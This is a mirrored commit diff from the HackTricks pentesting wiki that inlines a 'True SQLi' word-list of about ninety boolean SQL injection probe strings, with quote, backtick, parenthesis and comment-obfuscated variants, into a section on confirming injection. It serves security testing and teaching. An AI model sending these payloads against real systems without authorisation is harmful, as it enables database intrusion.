mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
true sqli
This commit is contained in:
parent
ca3d61e9ce
commit
15eda77173
@ -72,9 +72,93 @@ page.asp?id=1 and 1=2 -- results in false
|
||||
|
||||
This word-list was created to try to **confirm SQLinjections** in the proposed way:
|
||||
|
||||
{{#file}}
|
||||
sqli-logic.txt
|
||||
{{#endfile}}
|
||||
<details>
|
||||
<summary>True SQLi</summary>
|
||||
```
|
||||
true
|
||||
1
|
||||
1>0
|
||||
2-1
|
||||
0+1
|
||||
1*1
|
||||
1%2
|
||||
1 & 1
|
||||
1&1
|
||||
1 && 2
|
||||
1&&2
|
||||
-1 || 1
|
||||
-1||1
|
||||
-1 oR 1=1
|
||||
1 aND 1=1
|
||||
(1)oR(1=1)
|
||||
(1)aND(1=1)
|
||||
-1/**/oR/**/1=1
|
||||
1/**/aND/**/1=1
|
||||
1'
|
||||
1'>'0
|
||||
2'-'1
|
||||
0'+'1
|
||||
1'*'1
|
||||
1'%'2
|
||||
1'&'1'='1
|
||||
1'&&'2'='1
|
||||
-1'||'1'='1
|
||||
-1'oR'1'='1
|
||||
1'aND'1'='1
|
||||
1"
|
||||
1">"0
|
||||
2"-"1
|
||||
0"+"1
|
||||
1"*"1
|
||||
1"%"2
|
||||
1"&"1"="1
|
||||
1"&&"2"="1
|
||||
-1"||"1"="1
|
||||
-1"oR"1"="1
|
||||
1"aND"1"="1
|
||||
1`
|
||||
1`>`0
|
||||
2`-`1
|
||||
0`+`1
|
||||
1`*`1
|
||||
1`%`2
|
||||
1`&`1`=`1
|
||||
1`&&`2`=`1
|
||||
-1`||`1`=`1
|
||||
-1`oR`1`=`1
|
||||
1`aND`1`=`1
|
||||
1')>('0
|
||||
2')-('1
|
||||
0')+('1
|
||||
1')*('1
|
||||
1')%('2
|
||||
1')&'1'=('1
|
||||
1')&&'1'=('1
|
||||
-1')||'1'=('1
|
||||
-1')oR'1'=('1
|
||||
1')aND'1'=('1
|
||||
1")>("0
|
||||
2")-("1
|
||||
0")+("1
|
||||
1")*("1
|
||||
1")%("2
|
||||
1")&"1"=("1
|
||||
1")&&"1"=("1
|
||||
-1")||"1"=("1
|
||||
-1")oR"1"=("1
|
||||
1")aND"1"=("1
|
||||
1`)>(`0
|
||||
2`)-(`1
|
||||
0`)+(`1
|
||||
1`)*(`1
|
||||
1`)%(`2
|
||||
1`)&`1`=(`1
|
||||
1`)&&`1`=(`1
|
||||
-1`)||`1`=(`1
|
||||
-1`)oR`1`=(`1
|
||||
1`)aND`1`=(`1
|
||||
```
|
||||
</details>
|
||||
|
||||
### Confirming with Timing
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user